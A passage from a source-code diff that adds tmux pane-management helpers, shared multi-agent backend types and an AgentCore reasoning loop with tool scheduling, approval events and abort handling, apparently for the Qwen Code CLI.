string, +): Promise { + const output = await tmux( + [ + 'list-panes', + '-t', + target, + '-F', + '#{pane_id} #{pane_dead} #{pane_dead_status}', + ], + serverName, + ); + return parseTmuxListPanes(output); +} + +/** + * Parse the output of `tmux list-panes -F '#{pane_id} #{pane_dead} #{pane_dead_status}'`. + */ +export function parseTmuxListPanes(output: string): TmuxPaneInfo[] { + const panes: TmuxPaneInfo[] = []; + for (const line of output.trim().split('\n')) { + if (!line.trim()) continue; + const parts = line.trim().split(/\s+/); + if (parts.length < 2) continue; + panes.push({ + paneId: parts[0]!, + dead: parts[1] === '1', + deadStatus: parts[2] ? parseInt(parts[2], 10) : 0, + }); + } + return panes; +} + +/** + * Set a tmux option on a target pane/window. + */ +export async function tmuxSetOption( + target: string, + option: string, + value: string, + serverName?: string, +): Promise { + await tmux(['set-option', '-t', target, option, value], serverName); +} + +/** + * Respawn a pane with a new command. + * + * Kills the current process in the pane and starts a new one. + * The command becomes the pane's direct process, so `#{pane_dead}` + * is set when the command exits. + * + * @param paneId - Target pane ID + * @param command - Shell command to execute + */ +export async function tmuxRespawnPane( + paneId: string, + command: string, + serverName?: string, +): Promise { + await tmux(['respawn-pane', '-k', '-t', paneId, command], serverName); +} + +/** + * Break a pane into a target session (detaches from current window). + */ +export async function tmuxBreakPane( + paneId: string, + targetSession: string, + serverName?: string, +): Promise { + await tmux(['break-pane', '-s', paneId, '-t', targetSession], serverName); +} + +/** + * Join a pane into a target window. + */ +export async function tmuxJoinPane( + paneId: string, + target: string, + serverName?: string, +): Promise { + await tmux(['join-pane', '-s', paneId, '-t', target], serverName); +} + +/** + * Kill a tmux pane. + */ +export async function tmuxKillPane( + paneId: string, + serverName?: string, +): Promise { + await tmux(['kill-pane', '-t', paneId], serverName); +} + +/** + * Resize a tmux pane. + * + * @param paneId - Target pane ID + * @param opts.height - Height (number for lines, or string like '50%') + * @param opts.width - Width (number for columns, or string like '50%') + */ +export async function tmuxResizePane( + paneId: string, + opts: { height?: number | string; width?: number | string }, + serverName?: string, +): Promise { + const args = ['resize-pane', '-t', paneId]; + if (opts.height !== undefined) { + args.push('-y', String(opts.height)); + } + if (opts.width !== undefined) { + args.push('-x', String(opts.width)); + } + await tmux(args, serverName); +} + +/** + * Kill a tmux session. + */ +export async function tmuxKillSession( + name: string, + serverName?: string, +): Promise { + await tmux(['kill-session', '-t', name], serverName); +} + +/** + * Kill a tmux window. + */ +export async function tmuxKillWindow( + target: string, + serverName?: string, +): Promise { + await tmux(['kill-window', '-t', target], serverName); +} + +/** + * Get the first pane ID of a target window. + */ +export async function tmuxGetFirstPaneId( + target: string, + serverName?: string, +): Promise { + const output = await tmux( + ['list-panes', '-t', target, '-F', '#{pane_id}'], + serverName, + ); + const firstLine = output.trim().split('\n')[0]; + if (!firstLine) { + throw new Error(`No panes found in target: ${target}`); + } + return firstLine.trim(); +} diff --git a/packages/core/src/agents/backends/types.ts b/packages/core/src/agents/backends/types.ts new file mode 100644 index 000000000..98678fd0f --- /dev/null +++ b/packages/core/src/agents/backends/types.ts @@ -0,0 +1,276 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview Shared types for multi-agent systems (Arena, Team, Swarm) + * and the Backend abstraction layer. + * + * These types are used across different agent orchestration modes. + */ + +import type { Content } from '@google/genai'; +import type { AnsiOutput } from '../../utils/terminalSerializer.js'; +import type { + PromptConfig, + ModelConfig, + RunConfig, + ToolConfig, +} from '../runtime/agent-types.js'; + +/** + * Canonical display mode values shared across core and CLI. + */ +export const DISPLAY_MODE = { + IN_PROCESS: 'in-process', + TMUX: 'tmux', + ITERM2: 'iterm2', +} as const; + +/** + * Supported display mode values. + */ +export type DisplayMode = (typeof DISPLAY_MODE)[keyof typeof DISPLAY_MODE]; + +/** + * Configuration for spawning an agent subprocess. + */ +export interface AgentSpawnConfig { + /** Unique identifier for this agent */ + agentId: string; + /** Command to execute (e.g., the CLI binary path) */ + command: string; + /** Arguments to pass to the command */ + args: string[]; + /** Working directory for the subprocess */ + cwd: string; + /** Additional environment variables (merged with process.env) */ + env?: Record; + /** Terminal columns (default: 120) */ + cols?: number; + /** Terminal rows (default: 40) */ + rows?: number; + /** + * Backend-specific options (optional). + * These are ignored by backends that do not support them. + */ + backend?: { + tmux?: TmuxBackendOptions; + }; + + /** + * In-process spawn configuration (optional). + * When provided, InProcessBackend uses this to create an AgentInteractive + * instead of launching a PTY subprocess. + */ + inProcess?: InProcessSpawnConfig; +} + +/** + * Configuration for spawning an in-process agent (no PTY subprocess). + */ +export interface InProcessSpawnConfig { + /** Human-readable agent name for display. */ + agentName: string; + /** Optional initial task to start working on immediately. */ + initialTask?: string; + /** Runtime configuration for the AgentCore. */ + runtimeConfig: { + promptConfig: PromptConfig; + modelConfig: ModelConfig; + runConfig: RunConfig; + toolConfig?: ToolConfig; + }; + /** + * Per-agent auth/provider overrides. When present, a dedicated + * ContentGenerator is created for this agent instead of inheriting + * the parent process's. This enables Arena agents to target different + * model providers (OpenAI, Anthropic, Gemini, etc.) in the same session. + */ + authOverrides?: { + authType: string; + apiKey?: string; + baseUrl?: string; + }; + /** + * Optional chat history from the parent session. When provided, this + * history is prepended to the agent's chat so it has conversational + * context from the session that spawned it. + */ + chatHistory?: Content[]; +} + +/** + * Callback for agent exit events. + */ +export type AgentExitCallback = ( + agentId: string, + exitCode: number | null, + signal: number | null, +) => void; + +/** + * Backend abstracts the display/pane management layer for multi-agent systems. + * + * Each display mode (in-process / tmux / iTerm2) implements this interface. The orchestration + * layer (Arena, Team, etc.) delegates all pane operations through the backend, + * making the display mode transparent. + */ +export interface Backend { + /** Backend type identifier. */ + readonly type: DisplayMode; + + /** + * Initialize the backend. + * - in-process: runs in the current process (not yet implemented) + * - tmux: verifies tmux availability, creates session + * - iTerm2: verifies iTerm2 is running + */ + init(): Promise; + + // ─── Agent Lifecycle ──────────────────────────────────────── + + /** + * Spawn a new agent subprocess. + * + * @param config - Agent spawn configuration (command, args, cwd, env, etc.) + * @returns Promise that resolves when the agent's pane/PTY is created and ready. + */ + spawnAgent(config: AgentSpawnConfig): Promise; + + /** + * Stop a specific agent. + */ + stopAgent(agentId: string): void; + + /** + * Stop all running agents. + */ + stopAll(): void; + + /** + * Clean up all resources (kill processes, destroy panes/sessions). + */ + cleanup(): Promise; + + /** + * Register a callback for agent exit events. + */ + setOnAgentExit(callback: AgentExitCallback): void; + + /** + * Wait for all agents to exit, with an optional timeout. + * + * @returns true if all agents exited, false if timeout was reached. + */ + waitForAll(timeoutMs?: number): Promise; + + // ─── Active Agent & Navigation ────────────────────────────── + + /** + * Switch the active agent for screen capture and input routing. + */ + switchTo(agentId: string): void; + + /** + * Switch to the next agent in order. + */ + switchToNext(): void; + + /** + * Switch to the previous agent in order. + */ + switchToPrevious(): void; + + /** + * Get the ID of the currently active agent. + */ + getActiveAgentId(): string | null; + + // ─── Screen Capture ───────────────────────────────────────── + + /** + * Get the screen snapshot for the currently active agent. + * + * @returns AnsiOutput or null if no active agent or not supported. + */ + getActiveSnapshot(): AnsiOutput | null; + + /** + * Get the screen snapshot for a specific agent. + * + * @param agentId - Agent to capture + * @param scrollOffset - Lines to scroll back from viewport (default: 0) + * @returns AnsiOutput or null if not found or not supported. + */ + getAgentSnapshot(agentId: string, scrollOffset?: number): AnsiOutput | null; + + /** + * Get the maximum scrollback length for an agent's terminal buffer. + * + * @returns Number of scrollable lines, or 0 if not supported. + */ + getAgentScrollbackLength(agentId: string): number; + + // ─── Input ────────────────────────────────────────────────── + + /** + * Forward input to the currently active agent's PTY stdin. + * + * @returns true if input was forwarded, false otherwise. + */ + forwardInput(data: string): boolean; + + /** + * Write input to a specific agent's PTY stdin. + * + * @returns true if input was written, false otherwise. + */ + writeToAgent(agentId: string, data: string): boolean; + + // ─── Resize ───────────────────────────────────────────────── + + /** + * Resize all agent terminals/panes. + */ + resizeAll(cols: number, rows: number): void; + + // ─── External Session Info ───────────────────────────────── + + /** + * Get a user-facing hint for how to attach to the external display session. + * + * When the backend runs in external mode (e.g., a detached tmux server), + * this returns a shell command the user can run to view the agent panes. + * Returns null if not applicable (e.g., running inside tmux or iTerm2). + */ + getAttachHint(): string | null; +} + +/** + * Optional tmux backend configuration. + */ +export interface TmuxBackendOptions { + /** tmux server name for -L (when running outside tmux) */ + serverName?: string; + /** tmux session name to use/create (when running outside tmux) */ + sessionName?: string; + /** tmux window name to use/create (when running outside tmux) */ + windowName?: string; + /** Pane title for this agent */ + paneTitle?: string; + /** Border style for inactive panes (tmux style string, e.g. "fg=blue") */ + paneBorderStyle?: string; + /** Border style for active pane (tmux style string, e.g. "fg=green,bold") */ + paneActiveBorderStyle?: string; + /** Pane border format (default: "#{pane_title}") */ + paneBorderFormat?: string; + /** Pane border status location */ + paneBorderStatus?: 'top' | 'bottom' | 'off'; + /** Leader pane width percentage (default: 30) */ + leaderPaneWidthPercent?: number; + /** First split percent when inside tmux (default: 70) */ + firstSplitPercent?: number; +} diff --git a/packages/core/src/agents/index.ts b/packages/core/src/agents/index.ts new file mode 100644 index 000000000..d29d4dc09 --- /dev/null +++ b/packages/core/src/agents/index.ts @@ -0,0 +1,18 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview Multi-agent infrastructure shared across Arena, Team, and Swarm modes. + * + * This module provides the common building blocks for managing multiple concurrent + * agent subprocesses: + * - Backend: Display abstraction (tmux, iTerm2) + * - Shared types for agent spawning and lifecycle + */ + +export * from './backends/index.js'; +export * from './arena/index.js'; +export * from './runtime/index.js'; diff --git a/packages/core/src/agents/runtime/agent-core.ts b/packages/core/src/agents/runtime/agent-core.ts new file mode 100644 index 000000000..fb63cb530 --- /dev/null +++ b/packages/core/src/agents/runtime/agent-core.ts @@ -0,0 +1,1049 @@ +/** + * @license + * Copyright 2025 Qwen + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview AgentCore — the shared execution engine for subagents. + * + * AgentCore encapsulates the model reasoning loop, tool scheduling, stats, + * and event emission. It is composed by both AgentHeadless (one-shot tasks) + * and AgentInteractive (persistent interactive agents). + * + * AgentCore is stateless per-call: it does not own lifecycle or termination + * logic. The caller (executor/collaborator) controls when to start, stop, + * and how to interpret the results. + */ + +import { reportError } from '../../utils/errorReporting.js'; +import type { Config } from '../../config/config.js'; +import { type ToolCallRequestInfo } from '../../core/turn.js'; +import { + CoreToolScheduler, + type ToolCall, + type ExecutingToolCall, + type WaitingToolCall, +} from '../../core/coreToolScheduler.js'; +import type { + ToolConfirmationOutcome, + ToolCallConfirmationDetails, +} from '../../tools/tools.js'; +import { getInitialChatHistory } from '../../utils/environmentContext.js'; +import type { + Content, + Part, + FunctionCall, + GenerateContentConfig, + FunctionDeclaration, + GenerateContentResponseUsageMetadata, +} from '@google/genai'; +import { GeminiChat } from '../../core/geminiChat.js'; +import type { + PromptConfig, + ModelConfig, + RunConfig, + ToolConfig, +} from './agent-types.js'; +import { AgentTerminateMode } from './agent-types.js'; +import type { + AgentRoundEvent, + AgentRoundTextEvent, + AgentToolCallEvent, + AgentToolResultEvent, + AgentToolOutputUpdateEvent, + AgentUsageEvent, + AgentHooks, +} from './agent-events.js'; +import { type AgentEventEmitter, AgentEventType } from './agent-events.js'; +import { AgentStatistics, type AgentStatsSummary } from './agent-statistics.js'; +import { TaskTool } from '../../tools/task.js'; +import { DEFAULT_QWEN_MODEL } from '../../config/models.js'; +import { type ContextState, templateString } from './agent-headless.js'; + +/** + * Result of a single reasoning loop invocation. + */ +export interface ReasoningLoopResult { + /** The final model text response (empty if terminated by abort/limits). */ + text: string; + /** Why the loop ended. null = normal text completion (no tool calls). */ + terminateMode: AgentTerminateMode | null; + /** Number of model round-trips completed. */ + turnsUsed: number; +} + +/** + * Options for configuring a reasoning loop invocation. + */ +export interface ReasoningLoopOptions { + /** Maximum number of turns before stopping. */ + maxTurns?: number; + /** Maximum wall-clock time in minutes before stopping. */ + maxTimeMinutes?: number; + /** Start time in ms (for timeout calculation). Defaults to Date.now(). */ + startTimeMs?: number; +} + +/** + * Options for chat creation. + */ +export interface CreateChatOptions { + /** + * When true, omits the "non-interactive mode" system prompt suffix. + * Used by AgentInteractive for persistent interactive agents. + */ + interactive?: boolean; + /** + * Optional conversation history from a parent session. When provided, + * this history is prepended to the chat so the agent has prior + * conversational context (e.g., from the main session that spawned it). + */ + extraHistory?: Content[]; +} + +/** + * Legacy execution stats maintained for backward compatibility. + */ +export interface ExecutionStats { + startTimeMs: number; + totalDurationMs: number; + rounds: number; + totalToolCalls: number; + successfulToolCalls: number; + failedToolCalls: number; + inputTokens?: number; + outputTokens?: number; + totalTokens?: number; +} + +/** + * AgentCore — shared execution engine for model reasoning and tool scheduling. + * + * This class encapsulates: + * - Chat/model session creation (`createChat`) + * - Tool list preparation (`prepareTools`) + * - The inner reasoning loop (`runReasoningLoop`) + * - Tool call scheduling and execution (`processFunctionCalls`) + * - Statistics tracking and event emission + * + * It does NOT manage lifecycle (start/stop/terminate), abort signals, + * or final result interpretation — those are the caller's responsibility. + */ +export class AgentCore { + readonly subagentId: string; + readonly name: string; + readonly runtimeContext: Config; + readonly promptConfig: PromptConfig; + readonly modelConfig: ModelConfig; + readonly runConfig: RunConfig; + readonly toolConfig?: ToolConfig; + readonly eventEmitter?: AgentEventEmitter; + readonly hooks?: AgentHooks; + readonly stats = new AgentStatistics(); + + /** + * Legacy execution stats maintained for aggregate tracking. + */ + executionStats: ExecutionStats = { + startTimeMs: 0, + totalDurationMs: 0, + rounds: 0, + totalToolCalls: 0, + successfulToolCalls: 0, + failedToolCalls: 0, + inputTokens: 0, + outputTokens: 0, + totalTokens: 0, + }; + /** + * The prompt token count from the most recent model response. + * Exposed so UI hooks can seed initial state without waiting for events. + */ + lastPromptTokenCount = 0; + + private toolUsage = new Map< + string, + { + count: number; + success: number; + failure: number; + lastError?: string; + totalDurationMs?: number; + averageDurationMs?: number; + } + >(); + + constructor( + name: string, + runtimeContext: Config, + promptConfig: PromptConfig, + modelConfig: ModelConfig, + runConfig: RunConfig, + toolConfig?: ToolConfig, + eventEmitter?: AgentEventEmitter, + hooks?: AgentHooks, + ) { + const randomPart = Math.random().toString(36).slice(2, 8); + this.subagentId = `${name}-${randomPart}`; + this.name = name; + this.runtimeContext = runtimeContext; + this.promptConfig = promptConfig; + this.modelConfig = modelConfig; + this.runConfig = runConfig; + this.toolConfig = toolConfig; + this.eventEmitter = eventEmitter; + this.hooks = hooks; + } + + // ─── Chat Creation ──────────────────────────────────────── + + /** + * Creates a GeminiChat instance configured for this agent. + * + * @param context - Context state for template variable substitution. + * @param options - Chat creation options. + * - `interactive`: When true, omits the "non-interactive mode" system prompt suffix. + * @returns A configured GeminiChat, or undefined if initialization fails. + */ + async createChat( + context: ContextState, + options?: CreateChatOptions, + ): Promise { + if (!this.promptConfig.systemPrompt && !this.promptConfig.initialMessages) { + throw new Error( + 'PromptConfig must have either `systemPrompt` or `initialMessages` defined.', + ); + } + if (this.promptConfig.systemPrompt && this.promptConfig.initialMessages) { + throw new Error( + 'PromptConfig cannot have both `systemPrompt` and `initialMessages` defined.', + ); + } + + const envHistory = await getInitialChatHistory(this.runtimeContext); + + const startHistory = [ + ...envHistory, + ...(options?.extraHistory ?? []), + ...(this.promptConfig.initialMessages ?? []), + ]; + + const systemInstruction = this.promptConfig.systemPrompt + ? this.buildChatSystemPrompt(context, options) + : undefined; + + try { + const generationConfig: GenerateContentConfig & { + systemInstruction?: string | Content; + } = { + temperature: this.modelConfig.temp, + topP: this.modelConfig.top_p, + }; + + if (systemInstruction) { + generationConfig.systemInstruction = systemInstruction; + } + + return new GeminiChat( + this.runtimeContext, + generationConfig, + startHistory, + ); + } catch (error) { + await reportError( + error, + 'Error initializing chat session.', + startHistory, + 'startChat', + ); + return undefined; + } + } + + // ─── Tool Preparation ───────────────────────────────────── + + /** + * Prepares the list of tools available to this agent. + * + * If no explicit toolConfig or it contains "*" or is empty, + * inherits all tools (excluding TaskTool to prevent recursion). + */ + prepareTools(): FunctionDeclaration[] { + const toolRegistry = this.runtimeContext.getToolRegistry(); + const toolsList: FunctionDeclaration[] = []; + + if (this.toolConfig) { + const asStrings = this.toolConfig.tools.filter( + (t): t is string => typeof t === 'string', + ); + const hasWildcard = asStrings.includes('*'); + const onlyInlineDecls = this.toolConfig.tools.filter( + (t): t is FunctionDeclaration => typeof t !== 'string', + ); + + if (hasWildcard || asStrings.length === 0) { + toolsList.push( + ...toolRegistry + .getFunctionDeclarations() + .filter((t) => t.name !== TaskTool.Name), + ); + } else { + toolsList.push( + ...toolRegistry.getFunctionDeclarationsFiltered(asStrings), + ); + } + toolsList.push(...onlyInlineDecls); + } else { + // Inherit all available tools by default when not specified. + toolsList.push( + ...toolRegistry + .getFunctionDeclarations() + .filter((t) => t.name !== TaskTool.Name), + ); + } + + return toolsList; + } + + // ─── Reasoning Loop ─────────────────────────────────────── + + /** + * Runs the inner model reasoning loop. + * + * This is the core execution cycle: + * send messages → stream response → collect tool calls → execute tools → repeat. + * + * The loop terminates when: + * - The model produces a text response without tool calls (normal completion) + * - maxTurns is reached + * - maxTimeMinutes is exceeded + * - The abortController signal fires + * + * @param chat - The GeminiChat session to use. + * @param initialMessages - The first messages to send (e.g., user task prompt). + * @param toolsList - Available tool declarations. + * @param abortController - Controls cancellation of the current loop. + * @param options - Optional limits (maxTurns, maxTimeMinutes). + * @returns ReasoningLoopResult with the final text, terminate mode, and turns used. + */ + async runReasoningLoop( + chat: GeminiChat, + initialMessages: Content[], + toolsList: FunctionDeclaration[], + abortController: AbortController, + options?: ReasoningLoopOptions, + ): Promise { + const startTime = options?.startTimeMs ?? Date.now(); + let currentMessages = initialMessages; + let turnCounter = 0; + let finalText = ''; + let terminateMode: AgentTerminateMode | null = null; + + while (true) { + // Check abort before starting a new round — prevents unnecessary API + // calls after processFunctionCalls was unblocked by an abort signal. + if (abortController.signal.aborted) { + terminateMode = AgentTerminateMode.CANCELLED; + break; + } + + // Check termination conditions. + if (options?.maxTurns && turnCounter >= options.maxTurns) { + terminateMode = AgentTerminateMode.MAX_TURNS; + break; + } + + let durationMin = (Date.now() - startTime) / (1000 * 60); + if (options?.maxTimeMinutes && durationMin >= options.maxTimeMinutes) { + terminateMode = AgentTerminateMode.TIMEOUT; + break; + } + + // Create a new AbortController per round to avoid listener accumulation + // in the model SDK. The parent abortController propagates abort to it. + const roundAbortController = new AbortController(); + const onParentAbort = () => roundAbortController.abort(); + abortController.signal.addEventListener('abort', onParentAbort); + if (abortController.signal.aborted) { + roundAbortController.abort(); + } + + const promptId = `${this.runtimeContext.getSessionId()}#${this.subagentId}#${turnCounter++}`; + + const messageParams = { + message: currentMessages[0]?.parts || [], + config: { + abortSignal: roundAbortController.signal, + tools: [{ functionDeclarations: toolsList }], + }, + }; + + const roundStreamStart = Date.now(); + const responseStream = await chat.sendMessageStream( + this.modelConfig.model || + this.runtimeContext.getModel() || + DEFAULT_QWEN_MODEL, + messageParams, + promptId, + ); + this.eventEmitter?.emit(AgentEventType.ROUND_START, { + subagentId: this.subagentId, + round: turnCounter, + promptId, + timestamp: Date.now(), + } as AgentRoundEvent); + + const functionCalls: FunctionCall[] = []; + let roundText = ''; + let roundThoughtText = ''; + let lastUsage: GenerateContentResponseUsageMetadata | undefined = + undefined; + let currentResponseId: string | undefined = undefined; + + for await (const streamEvent of responseStream) { + if (roundAbortController.signal.aborted) { + abortController.signal.removeEventListener('abort', onParentAbort); + return { + text: finalText, + terminateMode: AgentTerminateMode.CANCELLED, + turnsUsed: turnCounter, + }; + } + + // Handle retry events + if (streamEvent.type === 'retry') { + continue; + } + + // Handle chunk events + if (streamEvent.type === 'chunk') { + const resp = streamEvent.value; + // Track the response ID for tool call correlation + if (resp.responseId) { + currentResponseId = resp.responseId; + } + if (resp.functionCalls) functionCalls.push(...resp.functionCalls); + const content = resp.candidates?.[0]?.content; + const parts = content?.parts || []; + for (const p of parts) { + const txt = p.text; + const isThought = p.thought ?? false; + if (txt && isThought) roundThoughtText += txt; + if (txt && !isThought) roundText += txt; + if (txt) + this.eventEmitter?.emit(AgentEventType.STREAM_TEXT, { + subagentId: this.subagentId, + round: turnCounter, + text: txt, + thought: isThought, + timestamp: Date.now(), + }); + } + if (resp.usageMetadata) lastUsage = resp.usageMetadata; + } + } + + if (roundText || roundThoughtText) { + this.eventEmitter?.emit(AgentEventType.ROUND_TEXT, { + subagentId: this.subagentId, + round: turnCounter, + text: roundText, + thoughtText: roundThoughtText, + timestamp: Date.now(), + } as AgentRoundTextEvent); + } + + this.executionStats.rounds = turnCounter; + this.stats.setRounds(turnCounter); + + durationMin = (Date.now() - startTime) / (1000 * 60); + if (options?.maxTimeMinutes && durationMin >= options.maxTimeMinutes) { + abortController.signal.removeEventListener('abort', onParentAbort); + terminateMode = AgentTerminateMode.TIMEOUT; + break; + } + + // Update token usage if available + if (lastUsage) { + this.recordTokenUsage(lastUsage, turnCounter, roundStreamStart); + } + + if (functionCalls.length > 0) { + currentMessages = await this.processFunctionCalls( + functionCalls, + roundAbortController, + promptId, + turnCounter, + toolsList, + currentResponseId, + ); + } else { + // No tool calls — treat this as the model's final answer. + if (roundText && roundText.trim().length > 0) { + finalText = roundText.trim(); + // Emit ROUND_END for the final round so all consumers see it. + // Previously this was skipped, requiring AgentInteractive to + // compensate with an explicit flushStreamBuffers() call. + this.eventEmitter?.emit(AgentEventType.ROUND_END, { + subagentId: this.subagentId, + round: turnCounter, + promptId, + timestamp: Date.now(), + } as AgentRoundEvent); + // Clean up before breaking + abortController.signal.removeEventListener('abort', onParentAbort); + // null terminateMode = normal text completion + break; + } + // Otherwise, nudge the model to finalize a result. + currentMessages = [ + { + role: 'user', + parts: [ + { + text: 'Please provide the final result now and stop calling tools.', + }, + ], + }, + ]; + } + + this.eventEmitter?.emit(AgentEventType.ROUND_END, { + subagentId: this.subagentId, + round: turnCounter, + promptId, + timestamp: Date.now(), + } as AgentRoundEvent); + + // Clean up the per-round listener before the next iteration + abortController.signal.removeEventListener('abort', onParentAbort); + } + + return { + text: finalText, + terminateMode, + turnsUsed: turnCounter, + }; + } + + // ─── Tool Execution ─────────────────────────────────────── + + /** + * Processes a list of function calls via CoreToolScheduler. + * + * Validates each call against the allowed tools list, schedules authorized + * calls, collects results, and emits events for each call/result. + * + * Validates each call, schedules authorized calls, collects results, and emits events. + */ + async processFunctionCalls( + functionCalls: FunctionCall[], + abortController: AbortController, + promptId: string, + currentRound: number, + toolsList: FunctionDeclaration[], + responseId?: string, + ): Promise { + const toolResponseParts: Part[] = []; + + // Build allowed tool names set for filtering + const allowedToolNames = new Set(toolsList.map((t) => t.name)); + + // Filter unauthorized tool calls before scheduling + const authorizedCalls: FunctionCall[] = []; + for (const fc of functionCalls) { + const callId = fc.id ?? `${fc.name}-${Date.now()}`; + + if (!allowedToolNames.has(fc.name)) { + const toolName = String(fc.name); + const errorMessage = `Tool "${toolName}" not found. Tools must use the exact names provided.`; + + // Emit TOOL_CALL event for visibility + this.eventEmitter?.emit(AgentEventType.TOOL_CALL, { + subagentId: this.subagentId, + round: currentRound, + callId, + name: toolName, + args: fc.args ?? {}, + description: `Tool "${toolName}" not found`, + isOutputMarkdown: false, + timestamp: Date.now(), + } as AgentToolCallEvent); + + // Build function response part (used for both event and LLM) + const functionResponsePart = { + functionResponse: { + id: callId, + name: toolName, + response: { error: errorMessage }, + }, + }; + + // Emit TOOL_RESULT event with error + this.eventEmitter?.emit(AgentEventType.TOOL_RESULT, { + subagentId: this.subagentId, + round: currentRound, + callId, + name: toolName, + success: false, + error: errorMessage, + responseParts: [functionResponsePart], + resultDisplay: errorMessage, + durationMs: 0, + timestamp: Date.now(), + } as AgentToolResultEvent); + + // Record blocked tool call in stats + this.recordToolCallStats(toolName, false, 0, errorMessage); + + // Add function response for LLM + toolResponseParts.push(functionResponsePart); + continue; + } + authorizedCalls.push(fc); + } + + // Build scheduler + const responded = new Set(); + let resolveBatch: (() => void) | null = null; + const emittedCallIds = new Set(); + // pidMap: callId → PTY PID, populated by onToolCallsUpdate when a shell + // tool spawns a PTY. Shared with outputUpdateHandler via closure so the + // PID is included in TOOL_OUTPUT_UPDATE events for interactive shell support. + const pidMap = new Map(); + const scheduler = new CoreToolScheduler({ + config: this.runtimeContext, + outputUpdateHandler: (callId, outputChunk) => { + this.eventEmitter?.emit(AgentEventType.TOOL_OUTPUT_UPDATE, { + subagentId: this.subagentId, + round: currentRound, + callId, + outputChunk, + pid: pidMap.get(callId), + timestamp: Date.now(), + } as AgentToolOutputUpdateEvent); + }, + onAllToolCallsComplete: async (completedCalls) => { + for (const call of completedCalls) { + if (emittedCallIds.has(call.request.callId)) continue; + emittedCallIds.add(call.request.callId); + + const toolName = call.request.name; + const duration = call.durationMs ?? 0; + const success = call.status === 'success'; + const errorMessage = + call.status === 'error' || call.status === 'cancelled' + ? call.response.error?.message + : undefined; + + // Record stats + this.recordToolCallStats(toolName, success, duration, errorMessage); + + // Emit tool result event + this.eventEmitter?.emit(AgentEventType.TOOL_RESULT, { + subagentId: this.subagentId, + round: currentRound, + callId: call.request.callId, + name: toolName, + success, + error: errorMessage, + responseParts: call.response.responseParts, + resultDisplay: call.response.resultDisplay, + durationMs: duration, + timestamp: Date.now(), + } as AgentToolResultEvent); + + // post-tool hook + await this.hooks?.postToolUse?.({ + subagentId: this.subagentId, + name: this.name, + toolName, + args: call.request.args, + success, + durationMs: duration, + errorMessage, + timestamp: Date.now(), + }); + + // Append response parts + const respParts = call.response.responseParts; + if (respParts) { + const parts = Array.isArray(respParts) ? respParts : [respParts]; + for (const part of parts) { + if (typeof part === 'string') { + toolResponseParts.push({ text: part }); + } else if (part) { + toolResponseParts.push(part); + } + } + } + } + // Signal that this batch is complete (all tools terminal) + resolveBatch?.(); + }, + onToolCallsUpdate: (calls: ToolCall[]) => { + for (const call of calls) { + // Track PTY PIDs so TOOL_OUTPUT_UPDATE events can carry them. + if (call.status === 'executing') { + const pid = (call as ExecutingToolCall).pid; + if (pid !== undefined) { + const isNewPid = !pidMap.has(call.request.callId); + pidMap.set(call.request.callId, pid); + // Emit immediately so the UI can offer interactive shell + // focus (Ctrl+F) before the tool produces its first output. + if (isNewPid) { + this.eventEmitter?.emit(AgentEventType.TOOL_OUTPUT_UPDATE, { + subagentId: this.subagentId, + round: currentRound, + callId: call.request.callId, + outputChunk: (call as ExecutingToolCall).liveOutput ?? '', + pid, + timestamp: Date.now(), + } as AgentToolOutputUpdateEvent); + } + } + } + + if (call.status !== 'awaiting_approval') continue; + const waiting = call as WaitingToolCall; + + // Emit approval request event for UI visibility + try { + const { confirmationDetails } = waiting; + const { onConfirm: _onConfirm, ...rest } = confirmationDetails; + this.eventEmitter?.emit(AgentEventType.TOOL_WAITING_APPROVAL, { + subagentId: this.subagentId, + round: currentRound, + callId: waiting.request.callId, + name: waiting.request.name, + description: this.getToolDescription( + waiting.request.name, + waiting.request.args, + ), + confirmationDetails: rest, + respond: async ( + outcome: ToolConfirmationOutcome, + payload?: Parameters< + ToolCallConfirmationDetails['onConfirm'] + >[1], + ) => { + if (responded.has(waiting.request.callId)) return; + responded.add(waiting.request.callId); + await waiting.confirmationDetails.onConfirm(outcome, payload); + }, + timestamp: Date.now(), + }); + } catch { + // ignore UI event emission failures + } + } + }, + getPreferredEditor: () => undefined, + onEditorClose: () => {}, + }); + + // Prepare requests and emit TOOL_CALL events + const requests: ToolCallRequestInfo[] = authorizedCalls.map((fc) => { + const toolName = String(fc.name || 'unknown'); + const callId = fc.id ?? `${fc.name}-${Date.now()}`; + const args = (fc.args ?? {}) as Record; + const request: ToolCallRequestInfo = { + callId, + name: toolName, + args, + isClientInitiated: true, + prompt_id: promptId, + response_id: responseId, + }; + + const description = this.getToolDescription(toolName, args); + const isOutputMarkdown = this.getToolIsOutputMarkdown(toolName); + this.eventEmitter?.emit(AgentEventType.TOOL_CALL, { + subagentId: this.subagentId, + round: currentRound, + callId, + name: toolName, + args, + description, + isOutputMarkdown, + timestamp: Date.now(), + } as AgentToolCallEvent); + + // pre-tool hook + void this.hooks?.preToolUse?.({ + subagentId: this.subagentId, + name: this.name, + toolName, + args, + timestamp: Date.now(), + }); + + return request; + }); + + if (requests.length > 0) { + // Create a per-batch completion promise + const batchDone = new Promise((resolve) => { + resolveBatch = () => { + resolve(); + resolveBatch = null; + }; + }); + + // Auto-resolve on abort so processFunctionCalls doesn't block forever + // when tools are awaiting approval or executing without abort support. + const onAbort = () => { + resolveBatch?.(); + for (const req of requests) { + if (emittedCallIds.has(req.callId)) continue; + emittedCallIds.add(req.callId); + + const errorMessage = 'Tool call cancelled by user abort.'; + this.recordToolCallStats(req.name, false, 0, errorMessage); + + this.eventEmitter?.emit(AgentEventType.TOOL_RESULT, { + subagentId: this.subagentId, + round: currentRound, + callId: req.callId, + name: req.name, + success: false, + error: errorMessage, + responseParts: [ + { + functionResponse: { + id: req.callId, + name: req.name, + response: { error: errorMessage }, + }, + }, + ], + resultDisplay: errorMessage, + durationMs: 0, + timestamp: Date.now(), + } as AgentToolResultEvent); + } + }; + abortController.signal.addEventListener('abort', onAbort, { once: true }); + + // If already aborted before the listener was registered, resolve + // immediately to avoid blocking forever. + if (abortController.signal.aborted) { + onAbort(); + } + + await scheduler.schedule(requests, abortController.signal); + await batchDone; + + abortController.signal.removeEventListener('abort', onAbort); + } + + // If all tool calls failed, inform the model so it can re-evaluate. + if (functionCalls.length > 0 && toolResponseParts.length === 0) { + toolResponseParts.push({ + text: 'All tool calls failed. Please analyze the errors and try an alternative approach.', + }); + } + + return [{ role: 'user', parts: toolResponseParts }]; + } + + // ─── Stats & Events 